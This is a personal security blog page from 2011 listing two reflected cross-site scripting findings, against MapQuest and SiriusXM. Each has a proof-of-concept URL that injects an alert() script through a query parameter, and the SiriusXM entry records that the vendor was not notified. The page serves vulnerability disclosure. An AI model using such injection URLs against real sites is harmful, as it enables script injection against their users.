This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
26
Jul 11

MapQuest

Date: Jul-26-2011
Vendor Notified: Yes
Proof of Concept:
http://web.sa.mapquest.com/wendys/advantage.adp?template=en_search_error&postalCode=\%27;alert(0)//

24
Jul 11

SiriusXM Satellite Radio

Date: Jul-24-2011
Vendor Notified: No
Proof of Concept:
http://www.siriusxm.com/servlet/Satellite?c=SXM_Channel_C&childpagename=SXM%2FSXM_Channel_C%2FChannelDetail&cid=--%3E%3Cscript%3Ealert(%270%27);%3C/script%3E&pagename=SXM%2FWrapper

Archives

Categories


Copyright © 2012 benburns.org
WordPress, sucka. Theme by Theme Lab